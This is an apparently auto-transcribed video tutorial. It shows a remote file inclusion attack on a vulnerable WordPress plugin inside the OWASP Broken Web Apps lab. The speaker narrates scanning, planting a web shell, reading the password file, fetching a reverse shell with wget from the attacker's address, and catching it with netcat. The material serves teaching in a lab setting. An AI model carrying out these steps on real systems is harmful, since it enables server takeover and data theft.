Okay, hey guys, welcome to Router, and today we are going to do a new thing which is called vulnerability analysis and exploitation. So today we're going to discuss about something called RFI, or remote file inclusion. Actually, what happens in a remote file inclusion is that you upload a piece of malicious code into a server, and then you execute it, and then you get control of the server. So that's what the vulnerability is called, remote file inclusion. So for that we are testing on a local machine which is called OWASP Broken Web Apps. As you can see, you can download it. I'll give you the download link in the descriptions, and then we can start. Okay, so sorry for the interruption. Anyway, we are experimenting on a virtual machine, virtual vulnerable machine, which is called OWASP Broken Web Apps. It has a lot of things. It's very good for experimenting. So here you can see it is giving us the IP address as 192.168.0.108. So so here you can see I typed the IP address, and it returned actually an indexed page here, it has a lot of things: webcode net, Vignum, Hexor, Cyclone, WordPress, Joomla. Lot of vulnerable apps you can do your your penetration testing. So we are choosing WordPress for our video, our topic in this. So let's see. Broken WordPress. Okay, so for the first thing, what we have to do, we have to create a new folder here. We're gonna call it vulnerable WP. WP stands for WordPress. Okay, so we're going to do everything in here. Okay, so we're going to terminal, and we're going to scan this thing, this WordPress for the vulnerabilities. Okay, so first WP scan, and then we're going for help, because I don't exactly remember the every piece of commands and arguments for this thing. So okay, so we're going for help. It's just taking a lot of time. So yeah, URL, for the URL we know that, and then enumerate all plugins, everything's, and we are okay, plugins version detection. We are going for aggressive. Okay, so here yes, WP scan URL, sorry, HTTP 192.168.0.108 WordPress. Now you need to understand why I'm using this slash WordPress, because if I use this IP address, it will return us to the index page, where which is not actually vulnerable, but it will redirect us to this page. So this is actually index page, but in this directory, the vulnerable WordPress is being hosted, so we're using that part only. So enumerate all plugins, all themes, sorry, it's not gonna all themes, users, and I'm gonna use this this argument right here. So we can call mode, plugins mode, copy and paste this mode. We are using aggressive. Okay, we're using aggressive mode, so that everything gets discovered. Okay, so you need to understand the piece of code here. We are basically telling WP scan to scan this URL. That's why here is a URL argument here. E for enumerate, AP for all plugins, E for enumerate again, AT for all themes, because there are many vulnerable things which we use in the WordPress that can be also be exploited to get to a shell. Then EU for users, admin users and others users with admin privileges in that WordPress. With an plugin version detection aggressive. So sometimes no, we're not going to use version, we are only going to use detection mode here because I need to see the plugins. Okay, we're ready to go. Let's see what happens. So it has started. So plugin detection aggressive, what actually means that it happens very often when actually a lot of plugins they not get detected because of the stealth mode. So we are using aggressive mode here. So we got one users here, admin, and we let's see, WordPress version 2. Okay, and theme is default theme. Okay, so we didn't really get any plugins here. Anyway, no problem there. So we're going to use this WordPress version 2.0. So it's saying that it's insecure. So we're going to use that to find if there is any vulnerability there. We are actually looking for a remote file inclusion. So yeah, okay, I'm going to open another tab and we're going to search exploit WordPress 2.0. So what actually search exploit does is that Kali has its own own set of exploits in this machine itself. So search exploit essentially what it does, it searches the exploits for you which is available offline. Okay, so okay, see there we have a lot of things here. So we are only interested in remote file inclusion, which is here, but it's a Joomla. Okay, admin PHP. Okay, so we are working with remote file inclusion. So let's also add these things here. So let's see if it works or not. Okay, we got one. So it's Joomla function PHP. Okay, plugin announcements. Okay, remote file inclusion. Okay, so we got function.php remote file inclusion. We're gonna download this and we're gonna read it. Okay, what it essentially saying, search exploit aim. So it has downloaded here. Let's see what it does. So if you want to remove sufficient sanitizer using the data, vulnerabilities. Okay. So as the result did not return a lot of things here, so we are only going to do a plugins detection here. So let's see if we get any plugins, because it's really hard for me to go by every exploit there. There should be some kind of plugins there which is actually vulnerable. Let's see what we get. Enumerating all plugins. Let's see what plugins we have here. I want to pause the video right here because it's gonna take some time. I'll come back when it's complete. Okay, our scan has completed, and let me show you what I used this time. So last time we were using a lot of arguments like this: enumerate all plugins, all themes, and all users. For that, our scan gone into a little bit of mess up. So this time we only used plugins detection aggressive and nothing else. So yep, we got some plugins which is vulnerable. So yeah, we got Akismet, we got MyGallery, which has directory listing is enabled, okay, and the directory is here, okay. So we're gonna search MyGallery plugin, okay, MyGallery plugin. How can we exploit this vulnerability, okay? So okay, search exploit on WordPress my gallery. Okay, we got an exploit. Let's download it. Copy. So it's downloaded. Let's see what does it say. Okay, so discovered V code. So this is a vulnerable code. So it's saying that whatever we write, whatever we execute after my path, whatever we execute after my path will get okay, my path will be inside the wp config.php. Okay, no problem there. So what it actually saying that if we add a parameter after this, it has given it here. So if we go to let's do it here like this. Okay, so the path for the gallery is here. So WordPress WP content plugins my gallery, and after my gallery, if we go to my functions and my gallery browser.php, and if we execute the PHP, and if we give my path after shell, so that means whatever we give after my path will get executed. So let me tell you how it is going to be. Okay, so we're gonna copy this thing right here, copy link address, and we're going to here broken WordPress. Okay, no problem there, and we're going to paste this here, paste and go. So okay, as you can see, this is a directory listing, and exactly what WP scan has told us, that directory listing is enabled. So for my gallery has already a vulnerability which is directory listing. You can see here it's listing a directory. Okay, so we need to go where we need to go to my gallery, then my functions, that my gallery browser PHP. Okay, no problem. So my functions, so already we are in my gallery, you can see. Then we need to go to my functions, and then we need to execute this code here, my gallery browser.php. Okay, it's not gonna show us anything, but we need to execute a code through a backdoor. So let me tell you what a backdoor is and how it works. Okay, so we got really beautiful backdoors available in Kali. Let me tell you how can you get it. So you need to go to home, into your directory structure, and then in user, and then in share, then there's a folder called web shells. We got the web shells, and it's in PHP. It's simple backdoor. You need this. Okay, so we are going to copy this and paste it here. Okay, so you got cut, sorry, paste. Okay, so what does this PHP says? This PHP says that it means that whatever we write after command will get executed. Okay, but we need to put this backdoor.php into the server. So how can we do it? Okay, let's see. We need to create our own server. Then after, you can see the usage here. So, and after the save it, and after putting this backdoor into the server, we can actually exploit the code. So let me show you how it's done. So at first we are gonna open our deploy a server here. So for deploying a server, we have Apache 2 available in every Kali Linux. There's no problem there. Service vic Apache 2 start. So our Apache server has started. So now we are gonna check if it's running or not. So you can see it's running. Okay, no problem. So the Apache, the PHP. So the directory for Apache server is in var www. Okay, var www html. So we need to put the backdoor file in there. Okay, copy and paste here. And now we need to give permission to the backdoor PHP. So we're just gonna call it backdoor PHP, nothing fancy. So rename backdoor PHP because it's very, you know, backdoor PHP. Okay, rename it, and we're going to chmod backdoor PHP. Now we we have to give the permission to backdoor PHP, what we just gave it. Now we need to put this thing into the server. So for that we need to see our own IP address. Open tab. So our IP address if config, so it's 106. Okay, so now how we can do that? We can do one thing. After this MYGALLERY PHP, we know that this PHP is vulnerable, so we are going to use this as, now we saw that whatever we write after command like id will get executed by the backdoor we are just putting there. Okay, so id, and now we use wget. Sorry, it was my path. Because that thing is vulnerable. wget http 106, which is our IP address because the server is running on our IP address, and the backdoor .php. Okay, so let's see if it works or not. Nothing happened. So I think we need to change these things to text. That's what happened. Let's see, text, because a lot of server does not allow direct PHP inclusion, so we need to text it. Nothing there. So what happens? Okay, there might be some problem there. Let me pause this video for a second. Okay, so sorry for the interruption right there. So we were actually, I was wrong. You don't need to put wget because we are not downloading the shell right there. Okay, we just referring that we are telling my path that go to this address and execute this PHP file right here. So okay, what we need to do is that actually we are telling my path parameter to go to this address and execute this thing, and then in this thing there is something written as cmd. So that cmd is here, and it is telling that please show us what is the id of your thing. You can change this thing to actually read the password file. Okay, or who am I. So let's go for who am I. So it's telling that you are www data. Okay, you can see many things like you can read the password file like this. So cat plus for the space, and it is hc password. So you can see the whole password file right here. So this is the vulnerability, and we are gonna use this thing. We're gonna use this thing to download this cmd parameter to download a reverse shell. Okay, a reverse shell. So so that we can connect back to our computer. Okay, so again there is a reverse shell available in Kali. So it's in web shells. Again go to user and then share, then web shells, and then PHP, and we got a reverse shell. Okay, So we need to copy this reverse shell here. So copy it and paste it here and paste it here. Okay, and we need to paste that in our Apache directory. So here, so var www vector.txt, and we're going to call this copy and paste here. And now we're going to change the permission. So chmod 777 back sorry php reversal.php. Okay, and now we're gonna change this name to rename it to shell.php. Actually, sorry, not shell.php. We're gonna change this to shell.txt. Okay, txt, because it's not gonna, the server is actually blocking php file inclusion. So we're gonna change the name again inside that, inside there. So okay, let's do it. So we're gonna download these things here. So command is equal to wget plus for space http 192.168.0.106, and then we are going to download this this thing here called shell.txt. We're gonna see if it is there or not. So for that we are going to do an ls command. Let's see. So okay, you can see the shell.txt has been downloaded. Now we need to copy this shell.txt into shell.php, otherwise it will not get executed. So okay, so we're going to do cp space shell.txt space shell.php. Then again we're gonna see if it's there or not for ls. Okay, as you can see, it's the shell.php is right here. So now we have to execute this thing. Okay, we have to execute this thing, otherwise our netcat won't be available to get executed. So I'm sorry, I'm terribly sorry. We had to change this the shell.txt into it's the IP address. We need to put our IP address here. Okay, so I'm gonna delete that. I'm gonna put that right here, and after that I'm gonna resume the video again. Okay, sorry for the interruption again. Okay, sorry for the inconvenience again. So actually what happened that I forgot to put my IP address in the backdoor. So actually what the backdoor says that you have to put your IP address here, change this, and you can change the port or whatever it is. I actually use 1234 port for netcat, so it's okay. So actually what it does, this shell.txt, we're gonna change it to PHP, and then we're gonna execute the PHP code. So what this piece of PHP code does is that it connects back to us in our IP address or whatever you put in this here, and for listening the back connection we are gonna use netcat. Okay, so let's see how that's gonna be. Okay, so here we're gonna open a netcat. Clear. So netcat use nc lbp. So L stands for listen, V stands for verbose, and P stands for port. So we're going to use 1 2 3 4 port because it's the same because it's in here. So if you change anything, the port like 4444 8080 or everything or anything whatever you does, you have to change it here also, because the connection is connecting back to us. Okay, so we're gonna open this netcat here, and it's already started listening here. Okay, no problem. So now we have to execute this piece of malicious code we just uploaded. So for that, go to command, because that's the command parameter, php and space shell.php. okay, So now you can see that the connection is connecting back to us. Okay, and now we got a shell here. Okay, so it's not an actual shell, it's a pseudo shell. So for getting an actual shell, I'm going to paste this command right in the description. Okay, so you can use this piece of code for get a Python shell, which is an actual shell. So okay, paste right there. Okay, so you can see we get an actual shell here, and we can do in the next part of this video we are going to do a privilege escalation. We are going to this user to root. Okay, so see you in the next video. Thank you, and if you like the video, please subscribe, and if you love it, please like the video. Okay, thank you, bye.